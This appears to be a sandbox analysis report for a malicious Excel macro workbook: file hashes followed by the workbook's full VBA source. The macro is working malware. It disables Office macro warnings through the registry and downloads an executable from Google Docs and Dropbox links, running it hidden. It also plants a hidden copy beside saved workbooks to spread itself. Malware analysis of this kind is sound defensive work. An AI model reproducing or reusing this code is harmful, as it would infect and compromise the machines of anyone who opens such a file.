Behavioral task
behavioral1
Sample
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976.xlsm
Resource
win10v2004-20240802-en
General
-
Target
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976
-
Size
92KB
-
MD5
1b2e1aaaeb6150a77145de383e7953d9
-
SHA1
4f1f7c95e3c8ec019b0e73d0f566477f7076300c
-
SHA256
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976
-
SHA512
4f20917d4ad28644da75db34d610672caf67eff78e2755cfa338ff30750a9f8b3db1cd3c6f0e5f0b19705c8f3096a5c5cf6189c003600d8346313a6ce0494bca
-
SSDEEP
1536:CguZCa6S5khUIeWL/bJC/4znOSjhLM+vGa/M1NIpPkUlB7583fjncFYIIpF1:CgugapkhleWztC/aPjpM+d/Ms8ULavL9
Malware Config
Signatures
-
resource sample
Files
-
a62f04bd712406133ee85038700bc2f9e71f18bff738347feba90fcc42e59976.xlsm office2007
ThisWorkbook
1Attribute VB_Name = "ThisWorkbook"2Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = True7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = True9Dim SheetsChanged As Boolean10Dim SheetCount As Integer1112Private Sub Workbook_Open()13Dim i As Integer14For i = 1 To ActiveWorkbook.Sheets.Count15ActiveWorkbook.Sheets(i).Visible = xlSheetVisible16Next i1718RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"19RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"2021Application.DisplayAlerts = False22SheetCount = Worksheets.Count2324Call MPS2526ActiveWorkbook.Sheets(1).Select27SheetsChanged = False28End Sub2930Private Sub Workbook_BeforeClose(Cancel As Boolean)31If Not SheetsChanged Then32ActiveWorkbook.Saved = True33End If34End Sub3536Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)37SheetsChanged = True38End Sub3940Private Sub Workbook_NewSheet(ByVal Sh As Object)41SheetsChanged = True42End Sub4344Private Sub Workbook_SheetActivate(ByVal Sh As Object)45If ActiveWorkbook.Sheets.Count <> SheetCount Then46SheetsChanged = True47SheetCount = ActiveWorkbook.Sheets.Count48End If49End Sub5051Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)52Dim i As Integer53Dim AIndex As Integer54Dim FName5556AIndex = ActiveWorkbook.ActiveSheet.Index5758If SaveAsUI = False Then59Cancel = True60Application.EnableEvents = False61Application.ScreenUpdating = False6263For i = 1 To ActiveWorkbook.Sheets.Count - 164ActiveWorkbook.Sheets(i).Visible = xlSheetHidden65Next i66ActiveWorkbook.Save6768For i = 1 To ActiveWorkbook.Sheets.Count69ActiveWorkbook.Sheets(i).Visible = xlSheetVisible70Next i71ActiveWorkbook.Sheets(AIndex).Select72SheetsChanged = False7374Application.ScreenUpdating = True75Application.EnableEvents = True76Else77Cancel = True78Application.EnableEvents = False79Application.ScreenUpdating = False8081For i = 1 To ActiveWorkbook.Sheets.Count - 182ActiveWorkbook.Sheets(i).Visible = xlSheetHidden83Next i8485FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalýþma Kitabý (*.xlsm), *.xlsm")86If FName <> False Then87ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled88SaveAsInj ActiveWorkbook.Path89End If9091For i = 1 To ActiveWorkbook.Sheets.Count92ActiveWorkbook.Sheets(i).Visible = xlSheetVisible93Next i94ActiveWorkbook.Sheets(AIndex).Select95SheetsChanged = False9697Application.ScreenUpdating = True98Application.EnableEvents = True99End If100End Sub101102Sub SaveAsInj(DIR As String)103Dim FSO As Object104Dim FN As String105106Set FSO = CreateObject("scripting.filesystemobject")107FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"108109If FSO.FileExists(FN) Then110If Not FSO.FileExists(DIR & "\~$cache1") Then111FileCopy FN, DIR & "\~$cache1"112End If113SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem114End If115End Sub116117Function RegKeyRead(i_RegKey As String) As String118Dim myWS As Object119120On Error Resume Next121Set myWS = CreateObject("WScript.Shell")122RegKeyRead = myWS.RegRead(i_RegKey)123End Function124125Function RegKeyExists(i_RegKey As String) As Boolean126Dim myWS As Object127128On Error GoTo ErrorHandler129Set myWS = CreateObject("WScript.Shell")130myWS.RegRead i_RegKey131RegKeyExists = True132Exit Function133134ErrorHandler:135RegKeyExists = False136End Function137138Sub RegKeySave(i_RegKey As String, _139i_Value As String, _140Optional i_Type As String = "REG_SZ")141Dim myWS As Object142143Set myWS = CreateObject("WScript.Shell")144myWS.RegWrite i_RegKey, i_Value, i_Type145End Sub146147Sub MPS()148Dim FSO As Object149Dim FP(1 To 3), TMP, URL(1 To 3) As String150151Set FSO = CreateObject("scripting.filesystemobject")152FP(1) = ActiveWorkbook.Path & "\~$cache1"153FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"154155URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"156URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"157URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"158TMP = Environ("Temp") & "\~$cache1.exe"159160If FSO.FileExists(FP(1)) Then161If Not FSO.FileExists(TMP) Then162FileCopy FP(1), TMP163End If164Shell TMP, vbHide165ElseIf FSO.FileExists(FP(2)) Then166If Not FSO.FileExists(TMP) Then167FileCopy FP(2), TMP168End If169Shell TMP, vbHide170Else171If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then172Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide173ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then174Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide175ElseIf Not FSO.FileExists(TMP) Then176If FDW((URL(1)), (TMP)) Then177ElseIf FDW((URL(2)), (TMP)) Then178ElseIf FDW((URL(3)), (TMP)) Then179End If180If FSO.FileExists(TMP) Then181Shell TMP, vbHide182End If183Else184Shell TMP, vbHide185End If186187End If188189End Sub190191Function FDW(MYU, NMA As String) As Boolean192Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")193If WinHttpReq Is Nothing Then194Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")195End If196197WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"198WinHttpReq.Option(6) = AllowRedirects199WinHttpReq.Open "GET", MYU, False200WinHttpReq.Send201202If (WinHttpReq.Status = 200) Then203If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then204FDW = True205Set oStream = CreateObject("ADODB.Stream")206oStream.Open207oStream.Type = 1208oStream.Write WinHttpReq.ResponseBody209oStream.SaveToFile (NMA)210oStream.Close211Else212FDW = False213End If214Else215FDW = False216End If217End Function218219